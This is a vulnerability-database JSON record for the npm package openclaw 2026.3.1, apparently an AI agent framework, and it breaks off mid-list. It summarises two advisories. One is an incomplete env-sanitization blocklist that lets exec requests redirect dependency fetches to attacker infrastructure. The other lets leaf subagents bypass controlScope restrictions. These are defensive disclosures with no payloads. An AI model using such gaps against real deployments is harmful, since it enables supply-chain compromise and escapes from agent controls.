{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","type":"npm","namespace":"","name":"openclaw","version":"2026.3.1","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"2026.4.23","latest_non_vulnerable_version":"2026.4.23","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91298?format=json","vulnerability_id":"VCID-11dg-bvft-6kb1","summary":"OpenClaw's incomplete host env sanitization blocklist allows supply-chain redirection via package-manager env overrides\n## Summary\n\nHost exec env override sanitization did not fail closed for several package-manager and related redirect variables that can steer dependency fetches or startup behavior.\n\n## Impact\n\nAn approved exec request could silently redirect package resolution or runtime bootstrap to attacker-controlled infrastructure and execute trojanized content.\n\n## Affected Component\n\n`src/infra/host-env-security-policy.json, src/infra/host-env-security.ts`\n\n## Fixed Versions\n\n- Affected: `< 2026.3.22`\n- Patched: `>= 2026.3.22`\n\n## Fix\n\nFixed by commit `7abfff756d` (`Exec: harden host env override handling across gateway and 
node`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41387","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06029","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06013","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06015","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41387"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.22","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}]
,"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.22"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j7p2-qcwm-94v4","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:50:39Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j7p2-qcwm-94v4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41387","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41387"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-supply-chain-redirection-via-incomplete-host-environment-sanitization","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}
,{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:50:39Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-supply-chain-redirection-via-incomplete-host-environment-sanitization"},{"reference_url":"https://github.com/advisories/GHSA-j7p2-qcwm-94v4","reference_id":"GHSA-j7p2-qcwm-94v4","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j7p2-qcwm-94v4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jw
j-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76
v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh
4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58
d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-41387","GHSA-j7p2-qcwm-94v4"],"risk_score":4.3,"exploitability":"0.5","weighted_severity":"8.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-11dg-bvft-6kb1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91737?format=json","vulnerability_id":"VCID-1728-wc17-dud6","summary":"OpenClaw leaf subagents can bypass 
controlScope restrictions to send messages to child sessions\n## Summary\nLeaf subagents could still use the send action to message controlled child sessions even when their `controlScope` was narrower than `children`.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `7679eb375294941b02214c234aff3948796969d0`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- `src/auto-reply/reply/commands-subagents/action-send.ts` now threads controller context through the send path.\n- `src/agents/subagent-control.ts` now blocks send attempts unless the requester owns the target and has `controlScope=\"children\"`.\n\nOpenClaw thanks @space08 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35662","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.111","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11059","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11093","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35662"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/
openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:24:11Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7679eb375294941b02214c234aff3948796969d0","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:24:11Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7679eb375294941b02214c234aff3948796969d0"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x2cm-hg9c-mf5w","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:24:11Z/"}],"url":"https://gith
ub.com/openclaw/openclaw/security/advisories/GHSA-x2cm-hg9c-mf5w"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35662","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35662"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-missing-controlscope-enforcement-in-send-action","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:24:11Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-missing-controlscope-enforcement-in-send-action"},{"reference_url":"https://github.com/advisories/GHSA-x2cm-hg9c-mf5w","reference_id":"GHSA-x2cm-hg9c-mf5w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x2cm-hg9c-mf5w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerabilit
y":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerabilit
y":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-ca